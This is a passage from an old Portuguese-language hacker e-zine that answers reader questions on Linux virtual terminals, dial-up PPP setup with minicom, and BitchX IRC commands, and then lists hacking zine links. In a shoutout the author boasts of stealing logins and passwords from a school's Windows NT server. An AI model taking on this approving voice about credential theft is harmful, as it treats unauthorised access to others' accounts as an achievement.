Aqui vao as suas respostas.

1 - Voce pode usar varios terminais TTY no linux, o que o considera multi-funcao. A cada terminal que utilizar tera que entrar com um login. Para entrar com outro terminal digiite Alt+FXX.

Exemplo: Voce entrou como root no TTY1, conectou-se e abriu o BitchX, entao se quizer abrir o Lynx em outro terminal digite Alt+F2, loge-se e abra o lynx. Moleza neh??

2 - Vou dar exemplo de como eu faço para me conectar a conex.
A) Edite o /etc/resolv.conf e acressente as seguintes linhas:

domain conex.com.br 
nameserver 200.248.100.3

B) Digite: echo "pppd /dev/modem 38400 defaultroute" >> /bin/connect
C) Abra o minicom (digite: minicom).
D) No minicom digite: atdp 3230011
E) Digite o login/senha
F) Segure Ctrl+A por alguns segundos, solte e tecle Z.
G) Tecle Q e confirme, para sair do programa.
H) Digite connect.
I) Pronto!!!

3- Deixa isso pra uma edicao futura. Os comandos de bitchx, sao muito relacionados ao mIRC. Aqui vai uma breve introduction:

/server <server>	-	Conecta ao <server> 
/echo msg - Exibe msg apenas a vc
/list -YES - Lista canais
/query <nick> - PVT com <nick>
/msg <nick> <msg> - Como se falasse por PVT com o <nick>
/join <#canal> - Entra em <#canal>
/part <#canal> - Sai do <#canal>
/ver <nick> - CTCP Version
/quit <msg> - Sai do BitchX deixando uma msg
/load <script> - Carrega um script
/help - Lista comandos

Tah bom assim??? Espero que sim. Continuem mandando emails..

°°°BoNuS!!!

Hacking TOP-10

1. zine Phrack (Ingles)
http://www.phrack.com


2. zine RWX
http://rwx.ml.org


3. zine Axur05
http://www.axur05.org


4. Root Shell (Ingles)
http://www.rootshell.com


5. zine SET (Espanhol)
http://www.geocities.com/SiliconValley/8726


6. zine POLICY SECURITY
http://www.thepentagon.com/policy


7. zine Hack and Phreak
http://www.hackphr.home.ml.org


8. zine NearZ
http://www.nearz.home.ml.org


9. zine The Death Knights
http://www.deathsdoor.com/tdk


10. Quebra de Sigilo
(Sabe que eu nao me lembro. Vai no www.cade.com.br e procura pelo nome)


Um [] para .....

..minha profesora de espanhol, que proporcionou a mim acessar o computador do colegio, que usa winNT, me dando a oportunidade(nao desperdicada) de roubar logins e senhas dos registros do servidor.
..ao Phantom Lord por matar aula por uma semana e nos proporcionar esses 5 dias de alegria.
..ao Simon Phoenix que entregou as materias em dobro para essa secao e ameacou nao escrever mais se nao aparecesse aqui.
..ao SoulSpy e so |zERo| mais uma vez, soh pra eles ficarem envergonhados de estarem aparecendo em varias edicoes seguidas da zine.
..a sociedade UKE, embora nao saiba o que significa, algo tipo... "Uniao dos Komedores de Elefantes(que foi fundada pelo |zERo|.


Um Pau na bunda para....
..Sei lah, embora pareca quase impossivel, essa semana eu nao briguei com muita gente..
..aH!! Soh pro IRCOP babaca que me deu Kline na quarta(ainda nao sei quem foi).


Tambem gostaria de publicar 2 paginas Eleet que encontrei a pouco..
http://members.xoom.com/fastdeath
http://members.xoom.com/tiraduvida

..E uma nova zine que encontrei(Security Team's Linux (c)). Ela pode ser encontrada na fastdeath hp(publicada acima).

Faloow D00D's!!!

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT